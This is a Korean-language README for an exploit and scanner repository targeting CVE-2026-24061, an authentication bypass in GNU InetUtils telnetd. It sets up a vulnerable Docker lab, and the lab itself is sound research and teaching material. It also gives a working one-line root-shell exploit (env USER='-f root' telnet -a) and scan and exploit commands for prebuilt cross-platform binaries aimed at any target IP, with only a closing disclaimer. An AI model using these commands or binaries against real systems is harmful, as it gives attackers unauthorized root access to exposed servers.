
CVE-2026-24061에 대한 익스플로잇 및 스캐너로, 조작된 USER 환경 변수를 통해 루트 셸을 부여하는 telnetd 인증 우회 취약점입니다. Docker 환경 설정과 크로스 플랫폼 익스플로잇 바이너리를 포함합니다.
CVE-2026-24061은 telnetd의 인증 우회 취약점으로, 공격자가 특정 환경 변수 조합을 통해 신원 검증을 우회하고 직접 루트 권한 셸을 획득할 수 있게 합니다.
telnetd의 인증 로직에 결함이 있습니다. -a 옵션(자동 로그인)과 특정 USER 환경 변수(예: -f root)를 함께 사용하면 정상적인 인증 과정을 우회하고 root 사용자로 직접 로그인할 수 있습니다.
GNU InetUtils는 GNU 프로젝트 산하의 기본 네트워크 도구 모음입니다. ftp, telnet, rsh, rlogin, tftp 등 많은 전통적인 네트워크 클라이언트와 데몬을 포함하여 포괄적이고 GNU 스타일의 네트워크 구성 요소 라이브러리를 제공합니다. telnetd는 이 툴킷에서 들어오는 Telnet 연결 요청을 처리하는 서버 프로그램으로, 원격 사용자에게 대화형 터미널 인터페이스(일반적으로 셸)를 제공하는 것이 주요 역할입니다.
inetd 또는 xinetd에 의해 포트 23에서 모니터링됩니다. 요청이 도착하면 telnetd가 시작됩니다.login 프로그램을 호출하여 사용자 이름과 비밀번호를 검증합니다.먼저 이 저장소를 로컬에 다운로드합니다. 디렉터리 구조는 다음과 같습니다:

이 디렉터리에서 다음 명령을 실행하여 CVE-2026-24061 취약 환경을 시작합니다:
docker compose up -d --build

시작 후 telnet 서비스는 0.0.0.0:2323에서 실행됩니다.

-a 옵션은 자동 로그인 기능을 활성화하는 데 사용됩니다.-a가 활성화되면 telnetd는 USER 환경 변수를 로그인 사용자 이름으로 읽습니다.USER 환경 변수가 -f root로 설정되면 telnetd는 -f를 옵션 플래그로, root를 대상 사용자로 잘못 해석합니다.# USER 환경 변수를 설정하고 telnet -a로 연결
env USER='-f root' telnet -a 127.0.0.1 2323
성공 시 root 권한을 가진 대화형 셸을 얻을 수 있습니다:

cd exp

exp, exp_darwin, exp.exe 세 개의 파일을 볼 수 있으며, 각각 Linux, Mac, Windows용 실행 파일입니다. 필요한 것을 선택하세요. 도구 소스 코드도 제공됩니다. 다른 버전이 필요하면 직접 컴파일할 수 있습니다. 여기서는 상세한 도움말 정보가 있는 Linux용 exp를 사용합니다.

취약점 존재 여부 탐지(기본적으로 포트 23 스캔):
./exp -mode scan -target your-ip -port your-port

취약점 악용 및 셸 획득:
./exp -mode exploit -target your-ip -port your-port

이 프로젝트는 보안 연구 및 교육 목적으로만 제공됩니다. 승인되지 않은 시스템에서 사용하지 마십시오. 이 도구 사용으로 인해 발생하는 모든 결과에 대한 법적 책임은 사용자에게 있습니다.